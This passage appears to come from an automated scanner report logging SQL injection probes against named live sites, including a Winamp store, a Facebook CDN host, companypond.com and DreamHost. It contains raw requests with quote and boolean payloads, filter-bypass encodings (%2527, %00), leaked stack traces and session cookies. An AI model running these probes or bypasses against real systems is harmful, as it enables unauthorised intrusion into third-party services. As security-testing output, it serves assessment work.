GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500&1'=1 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=131704877618,0) Date: Sun, 27 Feb 2011 17:47:41 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 41391
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... :include src="/store?1'=1&Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"--> ...[SNIP]... <pre>com.digitalriver.exception.TrackedSystemException: SIT_000002 at com.digitalriver.system.controller.SiteflowPlugin.determineNextPage(SiteflowPlugin.java:516) at com.digitalriver.system.controller.SiteflowPlugin.handleRequest( ...[SNIP]... .tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:690) at java.lang.Thread.run(Thread.java:619) Caused by: com.digitalriver.rules.EvaluationException: java.lang.NullPointerException Failed expression:product.getAllVariations() at com.digitalriver.rules.MethodInvocation.evaluate(MethodInvocation.java:190) at com.digitalriver.rules.MethodInvocation.evaluate(MethodInvocation.java:165)
...[SNIP]...
Request 2
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500&1''=1 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com/store?1''=1&Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=131704878770,0) Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:41 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59
The productID parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the productID parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500%2527 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=67280272038,0) Date: Sun, 27 Feb 2011 17:46:06 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 25208
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500%2527"--> ...[SNIP]... <pre>java.lang.NullPointerException at com.digitalriver.security.SecurityModuleImpl.isPageAllowed(SecurityModuleImpl.java:762) at sun.reflect.GeneratedMethodAccessor290.invoke(Unknown Source) at sun.reflect.DelegatingMethodAccessorIm ...[SNIP]...
Request 2
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500%2527%2527 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500%2527%2527 Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=67280272104,0) Content-Length: 0 Date: Sun, 27 Feb 2011 17:46:06 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59
The s_pers cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_pers cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B%2527; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=131704869494,0) Date: Sun, 27 Feb 2011 17:47:32 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 24205
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"--> ...[SNIP]... <pre>javax.servlet.ServletException: Required Page Parameter: productID not provided at com.digitalriver.system.controller.SiteflowPlugin.appendURLParamsAndSection(SiteflowPlugin.java:283) at com.digitalriver.system.controller.Siteflo ...[SNIP]...
Request 2
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B%2527%2527; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=131704869912,0) Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:33 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59
The s_sess cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sess cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%2527
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=131704872526,0) Date: Sun, 27 Feb 2011 17:47:36 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 24205
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"--> ...[SNIP]... <pre>javax.servlet.ServletException: Required Page Parameter: productID not provided at com.digitalriver.system.controller.SiteflowPlugin.appendURLParamsAndSection(SiteflowPlugin.java:283) at com.digitalriver.system.controller.Siteflo ...[SNIP]...
Request 2
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%2527%2527
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=131704873667,0) Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:36 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59
The BIGipServerp-drh-dc1pod5-pool1-active cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the BIGipServerp-drh-dc1pod5-pool1-active cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /store?Action=DisplayPage&Locale=en_US&SiteID=winamp&id=QuickBuyCartPage HTTP/1.1 Host: shop.winamp.com Connection: keep-alive Referer: http://forums.winamp.com/login.php?do=login Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828673274-New%7C1361900673274%3B%20s_nrgvo%3DNew%7C1361900673275%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/buy%252526ot%25253DA%3B; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000'
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=114525008612,0) Date: Sun, 27 Feb 2011 17:47:40 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 82107
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <pre>java.lang.RuntimeException: java.lang.RuntimeException: java.lang.RuntimeException: Error serving pageContext. at com.digitalriver.site.taglib.StyleTag.doStartTagInternal(StyleTag.java:47) at com.digitalriver.taglib.TagProfil ...[SNIP]...
Request 2
GET /store?Action=DisplayPage&Locale=en_US&SiteID=winamp&id=QuickBuyCartPage HTTP/1.1 Host: shop.winamp.com Connection: keep-alive Referer: http://forums.winamp.com/login.php?do=login Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828673274-New%7C1361900673274%3B%20s_nrgvo%3DNew%7C1361900673275%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/buy%252526ot%25253DA%3B; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000''
Response 2
HTTP/1.1 302 Moved Temporarily Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate, max-age=0, private Expires: Wed, 31 Dec 1969 23:59:59 GMT Location: http://shop.winamp.com:80/store?Action=DisplayPage&Env=BASE&Locale=en_US&SiteID=winamp&id=QuickBuyCartPage Content-Type: text/plain Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=24330695573,0) Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:40 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /rsrc.php/v1/yF/r'%20and%201%3d1--%20/QsQtRaU6mGT.css HTTP/1.1 Host: static.ak.fbcdn.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 7 Content-Type: text/html; charset=utf-8 X-Bad-Checksum: yF X-Powered-By: HPHP X-FB-Server: 10.138.64.184 Vary: Accept-Encoding Cache-Control: public, max-age=86400 Expires: Sun, 27 Feb 2011 23:10:57 GMT Date: Sat, 26 Feb 2011 23:10:57 GMT Connection: close
/*bcs*/
Request 2
GET /rsrc.php/v1/yF/r'%20and%201%3d2--%20/QsQtRaU6mGT.css HTTP/1.1 Host: static.ak.fbcdn.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.25. http://www.companypond.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.companypond.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Request 1
GET /?1%00'=1 HTTP/1.1 Host: www.companypond.com Proxy-Connection: keep-alive Referer: http://adam.companypond.com/peeps.php?email=4240be8e2dc90b4aef080848af60435f&bio=no Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 16:52:16 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 Set-Cookie: symfony=fa03e4bec9c60463fc37a80107a29a5b; path=/ X-Ua-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 73454
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="cs" lang="cs"> <head> <meta htt ...[SNIP]... Marketing Company based in Morristown, NJ with offices in Miami, FL. Our primary focus is helping small to medium sized businesses achieve online marketing success. Our clients come to Optimum7 after failing to achieve their marketing objectives online and... <a href="/optimum7" title="Profile for optimum7"> ...[SNIP]...
Request 2
GET /?1%00''=1 HTTP/1.1 Host: www.companypond.com Proxy-Connection: keep-alive Referer: http://adam.companypond.com/peeps.php?email=4240be8e2dc90b4aef080848af60435f&bio=no Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 16:52:18 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 Set-Cookie: symfony=fdc0940037a69faf36c2ec348d2ba8d4; path=/ X-Ua-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 66519
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="cs" lang="cs"> <head> <meta htt ...[SNIP]...
The 129733 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 129733 parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /r.cgi?129733' HTTP/1.1 Host: www.dreamhost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1 (redirected)
HTTP/1.1 502 Bad Gateway Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:19:38 GMT Content-Type: text/html Connection: close Content-Length: 575
<html> <head><title>502 Bad Gateway</title></head> <body bgcolor="white"> <center><h1>502 Bad Gateway</h1></center> <hr><center>nginx/0.8.53</center> </body> </html> <!-- a padding to disable MSIE and Chrome friendly error page --> ...[SNIP]...
Request 2
GET /r.cgi?129733'' HTTP/1.1 Host: www.dreamhost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.27. http://www.dreamhost.com/r.cgi [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.dreamhost.com
Path:
/r.cgi
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
